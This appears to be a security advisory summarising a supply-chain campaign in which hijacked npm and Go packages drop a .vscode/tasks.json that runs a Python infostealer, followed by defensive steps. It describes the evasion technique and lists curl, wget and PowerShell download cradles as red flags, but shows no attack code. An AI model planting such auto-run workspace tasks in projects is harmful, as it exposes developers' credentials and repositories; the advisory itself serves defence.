Hijacked npm and Go Packages Drop Python Infostealer via VS Code Tasks

Supply chain attackers have hijacked at least two npm packages and a cluster of Go modules, repurposing them to silently deploy a Python-based information stealer on developer machines running Windows, Linux, and macOS, according to researchers reporting at The Hacker News.

What Happened

The attack's most notable feature is its delivery mechanism. Rather than using npm lifecycle hooks (preinstall, postinstall) — the standard tripwire that SCA scanners and npm audit watch — the malicious packages inject a .vscode/tasks.json file into the victim's workspace. VS Code will automatically execute workspace tasks on folder open when the folder is trusted, meaning the payload fires without producing any npm install side-effect that conventional tooling would flag.

The Go module cluster follows a similar pattern, abusing the fetch process to pull down additional payloads at module resolution time. Once execution is achieved, a dropper installs a Python-based infostealer that harvests browser-stored credentials, session cookies, saved passwords, and crypto wallet files, exfiltrating them to an attacker-controlled endpoint.

Why It Matters

This campaign targets developers specifically, which makes the downstream risk unusually high:

• It evades standard scanning. Most SCA tools look at lifecycle scripts and known CVE databases — neither catches a malicious .vscode/tasks.json embedded in a package tarball.
• VS Code workspace trust is widely over-granted. CI runners, automated clone-and-open workflows, and individual developers routinely trust new folders without inspecting workspace config files.
• Cross-platform reach. The Python-based payload runs on all three major operating systems, so macOS and Linux developers have no implicit protection.
• High-value credential exposure. Stolen session cookies and cloud-provider API keys allow attackers to pivot directly into CI/CD pipelines, cloud environments, and source repositories — turning one compromised developer machine into a potential repo-poisoning vector.

What To Do

1. Audit .vscode/tasks.json in every project you've recently cloned or opened. Any task invoking python, curl, wget, or PowerShell download cradles outside your expected toolchain is a red flag.

1. Review workspace trust settings. In VS Code, search Settings for security.workspace.trust and audit your trusted folders (File → Preferences → Manage Trusted Folders & Workspaces). Remove trust from any folder you don't recognise.

1. Check recently added or updated npm and Go dependencies. Focus on packages added in the past several weeks. Compare current package tarballs against published versions on the registry if anything looks suspect.

1. Rotate credentials if you may be affected. Assume browser-stored passwords, SSH keys, AWS/GCP/Azure tokens, and API keys are compromised. Check authentication logs for anomalous sign-ins.

1. Switch to deeper SCA tooling. Scanners like Socket.dev or Phylum perform full package-content behavioral analysis rather than relying on metadata alone — the only layer that catches file-drop attacks like this one.

The specific package names and IOCs had not been fully published at time of writing. Watch The Hacker News coverage for confirmed indicators as they are released.